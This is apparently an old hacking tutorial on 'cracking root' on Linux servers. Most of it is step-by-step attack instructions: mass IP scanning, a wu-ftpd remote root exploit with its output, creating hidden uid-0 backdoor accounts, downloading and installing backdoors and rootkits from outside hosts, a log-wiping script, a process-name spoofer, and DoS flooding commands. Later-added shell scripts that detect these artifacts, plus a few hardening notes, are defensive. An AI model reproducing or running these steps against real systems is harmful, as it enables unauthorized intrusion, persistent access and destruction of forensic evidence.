Cracking Root
=======================================================
Tips:
mkdir .bash    <---- create a directory named .bash
cd .bash       <---- enter the .bash directory
mkdir          <---- create a new directory
cd             <---- enter the directory you want
cd /           <---- leave a directory (go to the root directory)
rm -rf         <---- delete a file/directory

1. Stage One
How to install xpost and ftp
wget http://cyberborneo.b0x.com/xpost.tgz
wget http://cyberborneo.b0x.com/ftp.tgz
tar -zxvf xpost.tgz
tar -zxvf ftp.tgz
======================================================
2. Stage Two
cd xpost
cd xwurm/
./scan 213.124
Once you have wu-scan.log:
./masswu wu-scan.log
When you get a message like the following:
Trying get root 213.124.151.113 ... SUCCESS, YOU HAVE ROOT IN 213.124.151.113 ... Logged in log-root ...
it means you have root access on the IP 213.124.151.113.
======================================================
3. Stage Three
Open a new session in your PuTTY SSH client, log back into your shell and enter your ftp directory:
cd ftp
./awu 213.124.151.113    (the IP)
If you succeed in getting root access, the following message appears:
7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).
# trying to log into 213.124.151.113 with (ftp/mozilla@) ... connected.
# banner: 220 db-depot01 FTP server (Version wu-2.6.1-16) ready.
# successfully selected target from banner
### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
# 1. filling memory gaps
# 2. sending bigbuf + fakechunk
building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes
# 3. triggering free(globlist[1])
#
# exploitation succeeded. sending real shellcode
# sending setreuid/chroot/execve shellcode
# spawning shell
############################################################################
uid=0(root) gid=0(root) groups=50(ftp)
Linux db-depot01 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
whoami
root    <-- means you are now running as root
======================================================
4. Stage Four
Add your own root login
---------------------------------------------------------------
1. Method I (not for Red Hat 7.2)
/usr/sbin/useradd rampok -u 0 -d /
passwd -d rampok
passwd rampok
su rampok    <<-------- for superuser
2. Method II
If you want root access, type:
/usr/sbin/useradd crit -u 0 -g 0 -d /etc/crit
then type:
passwd crit
wuasu666
Then add a user for your shell login:
/usr/sbin/adduser html -g wheel -s /bin/bash -d /etc/html
passwd html
fuck666 (twice)
=======================================================
5. Stage Five
Install a backdoor on your new shell to guard against unwanted surprises:
wget www.utay-doyan.cc/shv4.tar.gz
tar -zxvf shv4.tar.gz
cd shv4
./setup <password you want> <port you want>
example: --> ./setup wuasu 7000
cd /
wget http://cyberborneo.b0x.com/cleaner.tgz
tar -zxvf cleaner.tgz
cd cleaner
./install
Don't forget to delete your backdoor archives to remove the traces:
rm -rf cleaner.tgz
rm -rf shv4.tar.gz
===========================================
6. Stage Six
Erase the traces of your rooting by typing the following commands:
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog
Ctrl-D
DONE.....
Note that each of these steps is itself an indicator: a second uid-0 account in /etc/passwd, history files symlinked to /dev/null, and a zero-byte /var/log/messages or lastlog with a fresh modification time are exactly what an administrator or incident responder checks for first.
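The artifacts that Stages 4 to 6 leave behind (extra uid-0 accounts, history files pointing at /dev/null, truncated logs) can be checked for mechanically. The following POSIX shell audit is an added example and is not part of the original tutorial or of any of the tools it names. It inspects a filesystem root passed as its argument, so it can be run against "/" on a live host or against a constructed copy; the sample tree that make_sample_tree builds is constructed here for demonstration, and the file names it checks are assumptions about a typical Red Hat layout of the period.

```shell
#!/bin/sh
# audit_root_artifacts.sh: added example (not from the original tutorial).
# Looks for what Stages 4 to 6 leave behind on a Linux host. The first
# argument is the filesystem root to inspect: "/" on a live box, or a
# constructed copy such as the one make_sample_tree builds below.

# Every /etc/passwd account with uid 0 whose name is not "root"
# (the "rampok"/"crit" style accounts from Stage 4).
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1/etc/passwd"
}

# Shell history files that have been replaced by a symlink to /dev/null
# (Stage 6's "ln -s /dev/null /root/.bash_history").
nulled_history_files() {
    for f in "$1/root/.bash_history" "$1/.bash_history"; do
        if [ -L "$f" ] && [ "$(readlink "$f")" = /dev/null ]; then
            echo "$f"
        fi
    done
}

# Log files that exist but are zero bytes long, the result of
# "rm -f ...; touch ..." or "cat > /var/log/lastlog" in Stage 6.
empty_logs() {
    for name in messages secure lastlog wtmp xferlog; do
        p="$1/var/log/$name"
        if [ -f "$p" ] && [ ! -s "$p" ]; then
            echo "$p"
        fi
    done
}

# Prints the findings, then the number of findings (0 means clean).
audit_root() {
    findings=$( { extra_uid0_accounts "$1"; nulled_history_files "$1"; empty_logs "$1"; } )
    if [ -n "$findings" ]; then
        printf '%s\n' "$findings"
    fi
    printf '%s' "$findings" | awk 'END { print NR }'
}

# Constructed sample tree (not real system data) mimicking a host after
# Stages 4 to 6: two extra uid-0 accounts, a nulled history, a wiped log.
make_sample_tree() {
    mkdir -p "$1/etc" "$1/root" "$1/var/log"
    cat > "$1/etc/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
rampok:x:0:0::/:/bin/bash
crit:x:0:0::/etc/crit:/bin/bash
html:x:501:10::/etc/html:/bin/bash
EOF
    ln -s /dev/null "$1/root/.bash_history"
    : > "$1/var/log/messages"
    printf 'Jan  1 00:00:00 host sshd[1]: Accepted password for html\n' > "$1/var/log/secure"
}

# Usage: sh audit_root_artifacts.sh /    (inspect the live host)
#        sh audit_root_artifacts.sh      (demo against the sample tree)
if [ "$#" -eq 1 ]; then
    audit_root "$1"
else
    demo=$(mktemp -d)
    make_sample_tree "$demo"
    audit_root "$demo"
    rm -rf "$demo"
fi
```

The checks are deliberately cheap so they can run from cron or a rescue CD; a non-empty result is a lead, not proof, since some distributions legitimately rotate logs to zero bytes. The passwd check is the one that matters most, because a uid-0 account with any name is root regardless of what passwd(1) or the login name says.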
============================================================
One tip for wrecking a shell of yours that is broken or whose login password the admin has removed, provided you are still inside that shell:
wget http://cyberborneo.b0x.com/xzibit.tar.gz
tar -zxvf xzibit.tar.gz
cd lamerk
./install
cd /
rm -rf lamerk xzibit.tar.gz
============================================================
Some good links for exploit programs, DDoS, sniffing, security tools etc....
http://www.angelfire.com/de2/sirex3/linux.html
http://www.megspace.com/internet/wet/linux.html
http://www.s0ftpj.org/en/tools.html
http://web.textfiles.com/hacking/
http://www.honeynet.org/scans/
http://www.honeynet.org/scans/scan15/som/som30.txt
http://www.yolinux.com/TUTORIALS/LinuxSecurityTools.html
http://www.attrition.org/mirror/attrition/2000-07.html/
http://www.sans.org/rr/infowar/hacktivism2.php
http://www.antihackertoolkit.com/tools.html
http://www.hackinglinux.co.uk/
http://www.virtro.de/now_inhalt.html
http://packetstormsecurity.nl/misc.html
http://www.ariska.net/
http://www.valisie.com/Vali/
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Cure for tembak.c
>> echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
# Disables packet forwarding
net.ipv4.ip_forward = 0
# Enables source route verification
net.ipv4.conf.all.rp_filter = 1
# Enables automatic defragmentation (needed for masquerading, LVS)
net.ipv4.ip_always_defrag = 1
# Disables the magic-sysrq key
kernel.sysrq = 0
You can get a sample as "blockping.tar.gz"; just extract it and move the files to /usr/bin/.
(The echo into /proc/sys is lost at reboot; to keep it, add net.ipv4.icmp_echo_ignore_all = 1 to /etc/sysctl.conf next to the lines above. net.ipv4.ip_always_defrag exists only on 2.2 kernels; 2.4 and later ignore it.)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
*** Running tembak.c ***
./fake bash
./tembak zipey.net 53    (using the hider, without a root login)
./tembak ipaddress 53  or  ./tembak zipey.com 53
./tembak zipey.com 53 -->> means shooting zipey.com through port 53 (once port 53 is hit it is sure to die)
./fake real_process fake_process
./fake httpd
./teso -h 202.202.202.202
./fake -bash
./bnc bnc.conf
./fake pico
./eggdrop -m FroGStoNe
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
* Fake Background, made by buDZ
Greetz to: fabianclone, EF73 and all of #betalmostdone and #antihackerlink
/* [ilang.c] The best file for hiding the background process of Eggdrop and BNC.
   [http://members.tripod.com/alltoolkit]
   woRdz: d0n't cHangE beL0w thIs liNe , pRivatE stfU
   CrEatEd bY buDZ */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char fake[1000];

int main(int argc, char **argv)
{
    char *prog;
    if (argc < 3) {                     /* usage: ./fake <fakename> <program> [args...] */
        fprintf(stderr, "usage: %s fakename program [args...]\n", argv[0]);
        exit(1);
    }
    snprintf(fake, sizeof fake, "%s   ", argv[1]);  /* child argv[0]: fake name plus padding */
    prog = argv[2];
    argv[2] = fake;                     /* argv[2..] becomes the child's NULL-terminated argv */
    execv(prog, &argv[2]);              /* (the original execl() read argv[3..8] past the end) */
    perror("execv");
    exit(1);
}
Note that with this code the fake name comes first and the program path second, so an invocation with a single argument such as "./fake httpd" above exits without doing anything. Only argv[0] is changed: on Linux the comm field ("ps -eo pid,comm,args") and /proc/PID/exe still name the real executable.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
*** Hide BG process ***
gcc -o <filename> undo1.c
chmod +x <filename>
./undo httpd
./eggdrop -m eggdrop.conf
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
*** Wipe Login User *** (run it with a root login)
Upload wipe to the user's directory
chmod +x wipe
./wipe u username
./wipe l username
./wipe w username
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#!/bin/sh
clear
echo "log CLEANING SERVICE - rahul-x"
echo " "
echo "bersih... bersih... "
echo "Removing Files....."
echo " "
rm -f ~root/.bash_history
rm -f /var/log/lastlog
rm -f /var/log/netconf.log
rm -f /var/log/boot.log
rm -f /var/log/messages
rm -f /var/log/secure
rm -f /var/log/xferlog
echo "Creating Files......"
echo " "
touch ~root/.bash_history
touch /var/log/lastlog
touch /var/log/netconf.log
touch /var/log/boot.log
touch /var/log/messages
touch /var/log/secure
touch /var/log/xferlog
echo "Change Mode Files..."
echo " "
chmod 0664 ~root/.bash_history
chmod 0664 /var/log/lastlog
chmod 0664 /var/log/netconf.log
chmod 0664 /var/log/boot.log
chmod 0664 /var/log/messages
chmod 0664 /var/log/secure
chmod 0664 /var/log/xferlog
echo " "
echo "riped riped riped by rahul-x : ... "
echo " viva indonesia "
echo " "
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Closing the Samba hole against attacks with sambal.c
There is a very easy technique for this: edit the smb.conf file. Just find the section
----------------
[netlogon]
comment = Network Logon Service
path = /usr/local/samba/lib/netlogon
guest ok = yes
writable = no
share modes = no
----------------
and change
guest ok = yes
to
guest ok = no
Next stop Samba with the command
/etc/init.d/smb stop
to deactivate the running Samba configuration, then start it again with the command
/etc/init.d/smb start
to run the new configuration. After making this change, try the exploit again.
Note that this only removes anonymous guest access to that share; it is a workaround, not a patch, and the vulnerability itself is fixed only by upgrading Samba.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
cat /etc/passwd
Copy and paste it into Notepad.
Look for the entries ending in bash    <<= these can be made root again
Look at the numeric fields => :x:255:255:
Change the ones in the middle (the uid and gid) to 0, and remember which user you changed to 0.
cat > /etc/passwd
Press Enter, paste it back in, then press Ctrl-D, then Ctrl-C.
Check whether it worked, whether the 255 has changed to 0.
passwd user    <<= remember the name of the user whose 255 you changed to 0
Once that is done, log in and su straight away.
cd /lib/security
Create a directory named pam_res.so
cd pam_res.so
wget the cleaner there, inside pam_res.so. Nothing other than root is allowed there; you have to change the user name to root.
(Rewriting /etc/passwd through "cat >" from a paste is unforgiving: one mangled line locks every account out, including your own, and a uid-0 entry under any other name is the first thing a passwd audit reports.)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
openBSD:
wget http://packetstorm.decepticons.org/crypt/ssh/openssh/openssh-3.4p1.tar.gz
tar -zxvf openssh-3.4p1.tar.gz
wget www.renjana.com/sshutup-theo.tar.gz
tar -zxvf sshutup-theo.tar.gz
ls -al sshutuptheo
cd openssh-3.4p1
patch < ssh.diff
./configure
make ssh
./ssh -l root IP
example: ./ssh -l root shah.koptevo.net
http://www.netcraft.com/whats/?host=www.t-mems.com.tw
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Rooting SSH on LINUX, port 22:
wget http://packetstormsecurity.org/groups/teso/grabbb-0.1.0.tar.gz
tar -zxvf grabbb-0.1.0.tar.gz
cd grabbb
gcc -o grabbb grabbb.c
./grabbb -a IP -b IP port
example: ./grabbb -a 202.1.1.1 -b 202.1.1.1 22
66.201.243.210
wget www.suckmyass.org/ssh-scan8.tar.gz
tar -zxvf ssh-scan8.tar.gz
cd ssh-scan8
./r00t 203.20 -d 4    <--- mass SSH scan
./r00t 203.20 -d 2    <--- mass FTP scan
./r00t 203.20 -d 3    <--- mass FTP scan
./r00t 134.7. -d 4
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Rooting with massaphace:
./massossl 200 443 160
means scanning the 200.160 range on port 443.
Don't change port 443; only the IP may be changed, anything from 1 to 254, except 192.x.x.x and 10.x.x.x, which cannot be scanned because they are intranet (private) IPs.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
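The process-hiding trick used throughout the page (./fake, ilang.c, "./undo httpd") only rewrites argv[0]; on Linux the kernel still records the real executable in /proc/PID/exe and in the comm field, so "ps -eo pid,comm,args" already shows the disagreement. The script below is an added example, not part of the original page or of any tool it names; it makes that comparison over a proc-style directory so it can be run against /proc as root or against a constructed tree. The sample tree built by make_sample_proc (an sshd, an eggdrop renamed "httpd", a bnc renamed "-bash") is constructed here, and the paths in it are assumptions.

```shell
#!/bin/sh
# spoof_check.sh: added example (not from the original page). Finds processes
# whose argv[0], the name ps prints, does not match the executable they were
# started from, which is all that ./fake (ilang.c) changes. The kernel keeps
# the real name in /proc/PID/exe, so the mismatch is visible to root.
# The argument is the proc directory to scan: /proc on a live host, or a
# constructed tree such as the one make_sample_proc builds below.

# First NUL-separated word of a cmdline file, without any leading path, the
# leading "-" of a login-shell name, or the padding spaces ilang.c appends.
argv0_name() {
    tr '\0' '\n' < "$1" | head -n 1 | sed -e 's|.*/||' -e 's|^-||' -e 's/ *$//'
}

# Basename of the executable a process was started from ("(deleted)" marks
# a binary removed after starting, itself worth a second look).
exe_name() {
    readlink "$1" | sed -e 's| (deleted)$||' -e 's|.*/||'
}

# Prints "pid exe argv0" for every process whose two names disagree.
# Non-root users cannot read other users' exe links, so run it as root.
find_spoofed() {
    proc=${1:-/proc}
    for d in "$proc"/[0-9]*; do
        if [ -r "$d/cmdline" ] && [ -L "$d/exe" ]; then
            a=$(argv0_name "$d/cmdline")
            e=$(exe_name "$d/exe")
            if [ -n "$a" ] && [ -n "$e" ] && [ "$a" != "$e" ]; then
                echo "${d##*/} $e $a"
            fi
        fi
    done
}

# Constructed sample proc tree (no real processes): an honest sshd, an
# eggdrop started as "./fake httpd ./eggdrop -m eggdrop.conf" and a bnc
# started as "./fake -bash ./bnc bnc.conf". Paths are assumptions.
make_sample_proc() {
    mkdir -p "$1/100" "$1/200" "$1/300"
    ln -s /usr/sbin/sshd "$1/100/exe"
    printf '%s\0' sshd -D > "$1/100/cmdline"
    ln -s /home/html/eggdrop "$1/200/exe"
    printf '%s\0' 'httpd   ' -m eggdrop.conf > "$1/200/cmdline"
    ln -s /home/html/bnc "$1/300/exe"
    printf '%s\0' '-bash   ' bnc.conf > "$1/300/cmdline"
}

# Usage: sh spoof_check.sh /proc    (scan the live host, as root)
#        sh spoof_check.sh          (demo against the sample tree)
if [ "$#" -eq 1 ]; then
    find_spoofed "$1"
else
    demo=$(mktemp -d)
    make_sample_proc "$demo"
    find_spoofed "$demo"
    rm -rf "$demo"
fi
```

Treat a hit as a lead rather than proof: interpreters reached through symlinks (sh resolving to dash or bash, busybox applets) and daemons that legitimately rewrite their title also produce mismatches. A hit whose argv[0] is a shell or system daemon name but whose exe lives under a user's home directory, as in the sample, is the pattern this page's tricks produce.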